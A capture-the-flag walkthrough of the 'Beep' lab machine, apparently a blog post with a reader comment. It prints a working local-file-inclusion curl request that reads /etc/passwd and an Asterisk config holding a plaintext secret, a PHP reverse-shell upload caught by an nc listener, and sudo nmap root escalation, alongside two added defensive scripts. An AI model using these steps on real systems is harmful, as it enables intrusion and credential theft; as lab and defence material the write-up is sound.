BEEP
First a scan to get the open ports and services running.
    PORT      STATE SERVICE    VERSION
    22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
    | ssh-hostkey:
    |   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
    |_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
    25/tcp    open  smtp       Postfix smtpd
    |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
    80/tcp    open  http       Apache httpd 2.2.3
    |_http-server-header: Apache/2.2.3 (CentOS)
    |_http-title: Did not follow redirect to https://10.10.10.7/
    110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
    |_pop3-capabilities: IMPLEMENTATION(Cyrus POP3 server v2) PIPELINING EXPIRE(NEVER) STLS AUTH-RESP-CODE UIDL LOGIN-DELAY(0) APOP USER RESP-CODES TOP
    111/tcp   open  rpcbind    2 (RPC #100000)
    | rpcinfo:
    |   program version   port/proto  service
    |   100000  2         111/tcp     rpcbind
    |   100000  2         111/udp     rpcbind
    |   100024  1         743/udp     status
    |_  100024  1         746/tcp     status
    143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
    |_imap-capabilities: OK Completed NO SORT NAMESPACE BINARY THREAD=REFERENCES MAILBOX-REFERRALS X-NETSCAPE CATENATE THREAD=ORDEREDSUBJECT LISTEXT LIST-SUBSCRIBED MULTIAPPEND RIGHTS=kxte STARTTLS URLAUTHA0001 RENAME ATOMIC ANNOTATEMORE IDLE UNSELECT IMAP4 CONDSTORE IMAP4rev1 CHILDREN UIDPLUS QUOTA SORT=MODSEQ ID ACL LITERAL+
    443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
    | http-robots.txt: 1 disallowed entry
    |_/
    |_http-server-header: Apache/2.2.3 (CentOS)
    |_http-title: Elastix - Login page
    | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
    | Not valid before: 2017-04-07T08:22:08
    |_Not valid after: 2018-04-07T08:22:08
    |_ssl-date: 2018-06-21T12:15:07+00:00; -1h20m00s from scanner time.
    746/tcp   open  status     1 (RPC #100024)
    993/tcp   open  ssl/imap   Cyrus imapd
    |_imap-capabilities: CAPABILITY
    995/tcp   open  pop3       Cyrus pop3d
    3306/tcp  open  mysql      MySQL (unauthorized)
    4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
    4445/tcp  open  upnotifyp?
    4559/tcp  open  hylafax    HylaFAX 4.3.10
    5038/tcp  open  asterisk   Asterisk Call Manager 1.1
    10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
    |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
    Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

    Host script results:
    |_clock-skew: mean: -1h20m00s, deviation: 0s, median: -1h20m00s
A lot of open ports. Let’s start with the webserver.
Webserver 10.10.10.7:443
Webserver 10.10.10.7:443/admin
    root@n0w4n:~/opt/htb/beep# searchsploit elastix
    ------------------------------------------------------------ ----------------------------------------
     Exploit Title | Path
                   | (/usr/share/exploitdb/)
    ------------------------------------------------------------ ----------------------------------------
    Elastix - 'page' Cross-Site Scripting | exploits/php/webapps/38078.py
    Elastix - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/38544.txt
    Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/34942.txt
    Elastix 2.2.0 - 'graph.php' Local File Inclusion | exploits/php/webapps/37637.pl
    Elastix 2.x - Blind SQL Injection | exploits/php/webapps/36305.txt
    Elastix < 2.5 - PHP Code Injection | exploits/php/webapps/38091.php
    FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | exploits/php/webapps/18650.py
    ------------------------------------------------------------ ----------------------------------------
After a quick lookup it looks like Elastix has some issues. Combining that with FreePBX, I think I’m going to check out the Python script first, which should exploit an RCE vulnerability.
The Python script needs a little tweaking with the hosts, and it gives the following description:
    # On Elastix, once we have a shell, we can escalate to root:
    # root@bt:~# nc -lvp 443
    # listening on [any] 443 ...
    # connect to [172.16.254.223] from voip [172.16.254.72] 43415
    # id
    # uid=100(asterisk) gid=101(asterisk)
    # sudo nmap --interactive
That shouldn’t be too hard.
    Traceback (most recent call last):
      File "18650.py", line 27, in <module>
        urllib.urlopen(url)
      File "/usr/lib/python2.7/urllib.py", line 87, in urlopen
        return opener.open(url)
      File "/usr/lib/python2.7/urllib.py", line 213, in open
        return getattr(self, name)(url)
      File "/usr/lib/python2.7/urllib.py", line 443, in open_https
        h.endheaders(data)
      File "/usr/lib/python2.7/httplib.py", line 1038, in endheaders
        self._send_output(message_body)
      File "/usr/lib/python2.7/httplib.py", line 882, in _send_output
        self.send(msg)
      File "/usr/lib/python2.7/httplib.py", line 844, in send
        self.connect()
      File "/usr/lib/python2.7/httplib.py", line 1263, in connect
        server_hostname=server_hostname)
      File "/usr/lib/python2.7/ssl.py", line 369, in wrap_socket
        _context=self)
      File "/usr/lib/python2.7/ssl.py", line 617, in __init__
        self.do_handshake()
      File "/usr/lib/python2.7/ssl.py", line 846, in do_handshake
        self._sslobj.do_handshake()
    IOError: [Errno socket error] [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:726)
It gives back an error. It looks like there are some problems with SSL. Some adjustments to the script:
    import ssl
    # Turns off certificate verification for every HTTPS request made by this script
    ssl._create_default_https_context = ssl._create_unverified_context
After the adjustment the script runs fine, but there is no shell. Time to scan for the known VOIP devices and get more info.
    root@n0w4n:~/opt/htb/beep# svmap 10.10.10.7 -vv
    DEBUG:root:started logging
    DEBUG:root:parsing range of ports: 5060
    DEBUG:DrinkOrSip:external ip was not set
    INFO:DrinkOrSip:trying to get self ip .. might take a while
    DEBUG:DrinkOrSip:External ip: 127.0.1.1:5060
    DEBUG:DrinkOrSip:Compact mode: False
    DEBUG:DrinkOrSip:From: sipvicious <sip:100@1.1.1.1>
    INFO:root:start your engines
    DEBUG:DrinkOrSip:binding to 0.0.0.0:5060
    DEBUG:DrinkOrSip:sending packet to 10.10.10.7:5060
    DEBUG:DrinkOrSip:packet: 'OPTIONS sip:100@10.10.10.7 SIP/2.0\r\nVia: SIP/2.0/UDP 127.0.1.1:5060;branch=z9hG4bK-2103700663;rport\r\nContent-Length: 0\r\nFrom: "sipvicious"<sip:100@1.1.1.1>;tag=3061306130613037313363340132353839373937383931\r\nAccept: application/sdp\r\nUser-Agent: friendly-scanner\r\nTo: "sipvicious"<sip:100@1.1.1.1>\r\nContact: sip:100@127.0.1.1:5060\r\nCSeq: 1 OPTIONS\r\nCall-ID: 851657692881764133361587\r\nMax-Forwards: 70\r\n\r\n'
    DEBUG:DrinkOrSip:no more hosts to scan
    DEBUG:DrinkOrSip:Making sure that no packets get lost
    DEBUG:DrinkOrSip:Come to daddy
    DEBUG:DrinkOrSip:running fingerPrintPacket()
    DEBUG:DrinkOrSip:Fingerprint: disabled
    DEBUG:DrinkOrSip:Uaname: FPBX-2.8.1(1.8.7.0)
    INFO:DrinkOrSip:10.10.10.7:5060 -> 10.10.10.7:5060 -> FPBX-2.8.1(1.8.7.0) -> disabled
    INFO:root:we have 1 devices
    | SIP Device      | User Agent          | Fingerprint |
    -------------------------------------------------------
    | 10.10.10.7:5060 | FPBX-2.8.1(1.8.7.0) | disabled    |

    INFO:root:Total time: 0:00:03.076845
    root@n0w4n:~/opt/htb/beep# svwar -vv 10.10.10.7
    DEBUG:root:started logging
    DEBUG:TakeASip:external ip was not set
    INFO:TakeASip:trying to get self ip .. might take a while
    INFO:root:start your engines
    DEBUG:TakeASip:binding to any:5060
    ERROR:TakeASip:socket error: timed out
    WARNING:root:found nothing
    INFO:root:Total time: 0:00:03.160302
Looking at the output I could smack myself silly. The scripts try to bind with port 5060, which is the default port for SIP……..and it is closed…..from the beginning!
So it’s back to the initial port scan and check out what’s next.
I decide to get back to the webserver and run a dirsearch scan.
    root@n0w4n:~/opt/tools/dirsearch# python3 dirsearch.py -u https://10.10.10.7 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e php,txt -x 403,404

     _|. _ _  _  _  _ _|_    v0.3.8
    (_||| _) (/_(_|| (_| )

    Extensions: php, txt | Threads: 10 | Wordlist size: 141667

    Error Log: /root/opt/tools/dirsearch/logs/errors-18-06-27_10-38-22.log

    Target: https://10.10.10.7

    [10:38:22] Starting:
    [10:38:23] 200 -    2KB - /
    [10:38:24] 301 -  308B  - /help -> https://10.10.10.7/help/
    [10:38:25] 301 -  310B  - /images -> https://10.10.10.7/images/
    [10:38:53] 301 -  314B  - /recordings -> https://10.10.10.7/recordings/
    [10:39:09] 301 -  309B  - /panel -> https://10.10.10.7/panel/
    [10:40:07] 301 -  310B  - /static -> https://10.10.10.7/static/
    [10:40:11] 301 -  310B  - /themes -> https://10.10.10.7/themes/
    [10:40:31] 301 -  309B  - /admin -> https://10.10.10.7/admin/
    [10:45:06] 301 -  308B  - /mail -> https://10.10.10.7/mail/
    [10:45:11] 301 -  311B  - /modules -> https://10.10.10.7/modules/
    [10:46:13] 301 -  308B  - /lang -> https://10.10.10.7/lang/
    [10:49:12] 301 -  313B  - /vtigercrm -> https://10.10.10.7/vtigercrm/
    root@n0w4n:~/opt/htb/beep# searchsploit vtiger crm
    ------------------------------------------------------------ ----------------------------------------
     Exploit Title | Path
                   | (/usr/share/exploitdb/)
    ------------------------------------------------------------ ----------------------------------------
    Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit) | exploits/php/webapps/44379.rb
    vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions | exploits/php/webapps/2508.txt
    vTiger CRM 4.2 - SQL Injection | exploits/php/webapps/26586.txt
    vTiger CRM 4.2 Leads Module - 'record' Cross-Site Scripting | exploits/php/webapps/26584.txt
    vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting | exploits/php/webapps/26585.txt
    vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/32307.txt
    vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting | exploits/php/webapps/9450.txt
    vTiger CRM 5.0.4 - Unauthenticated Local File Inclusion | exploits/php/webapps/16280.py
    vTiger CRM 5.1.0 - Local File Inclusion | exploits/php/webapps/18770.txt
    vTiger CRM 5.2 - 'onlyforuser' SQL Injection | exploits/php/webapps/36208.txt
    vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/36204.txt
    vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (1) | exploits/php/webapps/36203.txt
    vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2) | exploits/php/webapps/36255.txt
    vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion | exploits/php/webapps/35574.txt
    vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting | exploits/php/webapps/35577.txt
    vTiger CRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit) | exploits/php/remote/29319.rb
    vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection | exploits/php/webapps/28409.txt
    vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit) | exploits/php/remote/30787.rb
    vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities | exploits/php/webapps/27279.txt
    vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion | exploits/php/webapps/32213.txt
    vTiger CRM 6.3.0 - Authenticated Remote Code Execution | exploits/php/webapps/38345.txt
    ------------------------------------------------------------ ----------------------------------------
    Shellcodes: No Result
Looks like version 5.1.0 has an LFI vulnerability.
    Exploit Title: VTiger CRM
    # Google Dork: None
    # Date: 20/03/2012
    # Author: Pi3rrot
    # Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/
    # Version: 5.1.0
    # Tested on: CentOS 6
    # CVE : none

    We have find this vulnerabilitie in VTiger 5.1.0
    In this example, you can see a Local file Inclusion in the file sortfieldsjson.php

    Try this :
    https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
That’s easy to test.
    root@n0w4n:~# curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    news:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
    distcache:x:94:94:Distcache:/:/sbin/nologin
    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    pcap:x:77:77::/var/arpwatch:/sbin/nologin
    ntp:x:38:38::/etc/ntp:/sbin/nologin
    cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
    dbus:x:81:81:System message bus:/:/sbin/nologin
    apache:x:48:48:Apache:/var/www:/sbin/nologin
    mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
    rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
    postfix:x:89:89::/var/spool/postfix:/sbin/nologin
    asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
    rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
    nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    spamfilter:x:500:500::/home/spamfilter:/bin/bash
    haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
    xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
    fanis:x:501:501::/home/fanis:/bin/bash
Let’s grab the first flag.
    root@n0w4n:~# curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../home/fanis/user.txt%00
    aeff3def0c765c2677b94715cffa73ac
Because I don’t have the ability to search at my leisure in the file system, I’m going to look for interesting files for the programs I know are installed and to which I have access, like Asterisk (https://www.voip-info.org/asterisk-config-files/).
    root@n0w4n:~# curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00
    ;
    ; AMI - Asterisk Manager interface
    ;
    ; FreePBX needs this to be enabled. Note that if you enable it on a different IP, you need
    ; to assure that this can't be reached from un-authorized hosts with the ACL settings (permit/deny).
    ; Also, remember to configure non-default port or IP-addresses in amportal.conf.
    ;
    ; The AMI connection is used both by the portal and the operator's panel in FreePBX.
    ;
    ; FreePBX assumes an AMI connection to localhost:5038 by default.
    ;
    [general]
    enabled = yes
    port = 5038
    bindaddr = 0.0.0.0
    displayconnects=no ;only effects 1.6+

    [admin]
    secret = jEhdIekWmdjE
    deny=0.0.0.0/0.0.0.0
    permit=127.0.0.1/255.255.255.0
    read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
    write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate

    #include manager_additional.conf
    #include manager_custom.conf
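From the defender's side, the requests above leave a clear signature in the web server's access log: ".." path segments and a %00 inside the module_name parameter. The following is an added example (not part of the original post) that scans Apache access-log lines for both, decoding repeatedly so double-encoded variants are caught as well. The log lines, the second client address and the /help/index.php request are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Apache common/combined log prefix: host ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not taken from the target's real logs).
SAMPLE_LOG = """\
10.10.14.2 - - [27/Jun/2018:11:02:13 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1755
10.10.14.2 - - [27/Jun/2018:11:05:40 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=%252e%252e%252f%252e%252e%252fetc%252fasterisk%252fmanager.conf%2500 HTTP/1.1" 404 210
10.10.14.9 - - [27/Jun/2018:11:06:02 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=Accounts HTTP/1.1" 200 312
10.10.14.9 - - [27/Jun/2018:11:07:19 +0000] "GET /help/index.php?file=notes..v2.txt HTTP/1.1" 200 98
"""


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is unmasked."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return one finding per suspicious query parameter in a log line."""
    match = LOG_RE.match(line)
    if not match:
        return []
    findings = []
    for pair in urlsplit(match["target"]).query.split("&"):
        name, _, raw = pair.partition("=")
        value = fully_decode(raw).replace("\\", "/")
        reasons = []
        if "\x00" in value:
            reasons.append("null-byte")   # %00 cuts off a suffix the script appends
        if ".." in value.split("/"):
            reasons.append("traversal")   # ".." as a whole path segment only
        if reasons:
            # Approximate target: drop everything from the NUL, normalise against "/".
            resolved = posixpath.normpath("/" + value.split("\x00", 1)[0])
            findings.append({
                "ip": match["ip"], "param": name, "reasons": reasons,
                "resolved": resolved, "served": match["status"] == "200",
            })
    return findings


def scan(log_text):
    return [f for line in log_text.splitlines() for f in inspect_line(line)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with served set to True means the server answered 200 to the traversal request, which is the case worth escalating first.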
After a few tries I get some credentials. With these credentials I have access to the dashboard of Elastix, FreePBX and vtigerCRM.
With vtigercrm there are a few possibilities to upload files. I go with changing the company logo.
For the uploading of the file I’ll use the php reverse shell script from pentestmonkey. After uploading the file I find the uploaded file in the /test/ folder.
    root@n0w4n:~/opt/htb/beep# nc -lnvp 31337
    listening on [any] 31337 ...
    connect to [10.10.14.2] from (UNKNOWN) [10.10.10.7] 58766
    Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 i686 i386 GNU/Linux
     12:55:40 up 2 days, 9:44, 0 users, load average: 0.00, 0.06, 0.07
    USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
    uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
    sh: no job control in this shell
    sh-3.2$ id
    uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
Now for root.
    sh-3.2$ sudo -l
    Matching Defaults entries for asterisk on this host:
        env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"

    User asterisk may run the following commands on this host:
        (root) NOPASSWD: /sbin/shutdown
        (root) NOPASSWD: /usr/bin/nmap
        (root) NOPASSWD: /usr/bin/yum
        (root) NOPASSWD: /bin/touch
        (root) NOPASSWD: /bin/chmod
        (root) NOPASSWD: /bin/chown
        (root) NOPASSWD: /sbin/service
        (root) NOPASSWD: /sbin/init
        (root) NOPASSWD: /usr/sbin/postmap
        (root) NOPASSWD: /usr/sbin/postfix
        (root) NOPASSWD: /usr/sbin/saslpasswd2
        (root) NOPASSWD: /usr/sbin/hardware_detector
        (root) NOPASSWD: /sbin/chkconfig
        (root) NOPASSWD: /usr/sbin/elastix-helper
Some nmap flags, like -sS, require root, but giving nmap to a restricted user through sudo is not a normal choice. Also, having nmap at root level gives great possibilities.
    sh-3.2$ sudo nmap --interactive

    Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
    Welcome to Interactive Mode -- press h <enter> for help
    nmap> !id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    nmap> waiting to reap child: No child processes (10)
    !sh
    id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    cd /root
    ls
    anaconda-ks.cfg
    elastix-pr-2.2-1.i386.rpm
    install.log
    install.log.syslog
    postnochroot
    root.txt
    webmin-1.570-1.noarch.rpm
    cat root.txt
    /bin/cat: line 1: bash:: command not found
    /bin/cat: line 2: /etc/passwd:: No such file or directory
    /bin/cat: line 3: /etc/passwd:: No such file or directory
    /bin/cat: line 4: /etc/passwd:: No such file or directory
    /bin/cat: line 5: /etc/passwd:: No such file or directory
    /bin/cat: line 6: /etc/passwd:: No such file or directory
    /bin/cat: line 7: /etc/passwd:: No such file or directory
    /bin/cat: line 8: /etc/passwd:: No such file or directory
    /bin/cat: line 9: /etc/passwd:: No such file or directory
    /bin/cat: line 10: /etc/passwd:: No such file or directory
    /bin/cat: line 11: /etc/passwd:: No such file or directory
    /bin/cat: line 12: /etc/passwd:: No such file or directory
    /bin/cat: line 13: /etc/passwd:: No such file or directory
    /bin/cat: line 14: /etc/passwd:: No such file or directory
    /bin/cat: line 15: /etc/passwd:: No such file or directory
    /bin/cat: line 16: /etc/passwd:: No such file or directory
    /bin/cat: line 17: /etc/passwd:: No such file or directory
    /bin/cat: line 18: /etc/passwd:: No such file or directory
    /bin/cat: line 19: /etc/passwd:: No such file or directory
    /bin/cat: line 20: /etc/passwd:: No such file or directory
    /bin/cat: line 21: /etc/passwd:: No such file or directory
    /bin/cat: line 22: /etc/passwd:: No such file or directory
    /bin/cat: line 23: /etc/passwd:: No such file or directory
    /bin/cat: line 24: /etc/passwd:: No such file or directory
    /bin/cat: line 25: /etc/passwd:: No such file or directory
    /bin/cat: line 26: /etc/passwd:: No such file or directory
    /bin/cat: line 27: /etc/passwd:: No such file or directory
    /bin/cat: line 28: /etc/passwd:: No such file or directory
    /bin/cat: line 29: /etc/passwd:: No such file or directory
    /bin/cat: line 30: /etc/passwd:: No such file or directory
    /bin/cat: line 31: /etc/passwd:: No such file or directory
    /bin/cat: line 32: /etc/passwd:: No such file or directory
    /bin/cat: line 33: /etc/passwd:: No such file or directory
    /bin/cat: line 34: /etc/passwd:: No such file or directory
    /bin/cat: line 35: /etc/passwd:: No such file or directory
    /bin/cat: line 36: /etc/passwd:: No such file or directory
No /bin/cat? LOL….funny….but no problem.
    tac root.txt | tac
    d88e006123842106982acce0aaf453f0
And it’s done!!!
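The sudo -l listing earlier is the kind of output a hardening review should triage before an attacker does. The following is an added example (not part of the original post) that parses such a listing and ranks every command runnable as root; the risk table is written for this example and is an assumption, not an exhaustive list.

```python
import re

# `sudo -l` entries as listed on this page (the Defaults lines are left out).
SUDO_L = """\
User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
"""

# Risk table written for this example: an assumption, not an exhaustive list.
RISK = {
    "nmap": ("high", "old releases have an interactive mode that runs shell commands"),
    "yum": ("high", "installs packages whose scriptlets run as root"),
    "chmod": ("high", "can change the mode of any file on the system"),
    "chown": ("high", "can take ownership of any file on the system"),
    "service": ("medium", "starts and stops any init script"),
    "init": ("medium", "switches runlevel, including halt and reboot"),
    "shutdown": ("medium", "halts or reboots the host"),
    "touch": ("medium", "creates or re-timestamps any file"),
}
ORDER = {"high": 0, "medium": 1, "review": 2}
ENTRY_RE = re.compile(
    r"\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)(?P<args>[^\n]*)"
)

def audit(sudo_l_output):
    """Classify every command that may be run as root, worst first."""
    findings = []
    for m in ENTRY_RE.finditer(sudo_l_output):
        users = {u.strip() for u in m["runas"].split(":")[0].split(",")}
        if not users & {"root", "ALL"}:
            continue
        binary = m["cmd"].rsplit("/", 1)[-1]
        level, why = RISK.get(binary, ("review", "not in the table; check by hand"))
        findings.append({
            "command": m["cmd"],
            "level": level,
            "why": why,
            "nopasswd": "NOPASSWD:" in m["tags"],
            # A sudoers entry without an argument list accepts any arguments.
            "any_args": not m["args"].strip(),
        })
    return sorted(findings, key=lambda f: (ORDER[f["level"]], f["command"]))

if __name__ == "__main__":
    for f in audit(SUDO_L):
        print(f'{f["level"]:<7}{f["command"]:<30}{f["why"]}')
```

Entries where both nopasswd and any_args are true are the ones to remove or pin to a fixed argument list first.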
Hi!
Thanks for this doc, very well done!
I have a question 🙂
Which reverse shell did you upload on vtigercrm? I’ve been blocked at this point for 2 days 🙁
I uploaded a php reverse shell changing the extension to .php;.jpg in order to pass the sanity for the file. But then I cannot trigger the reverse shell.
Any help?
Thanks
I used the reverse php shell from PentestMonkey (http://pentestmonkey.net/tools/web-shells/php-reverse-shell).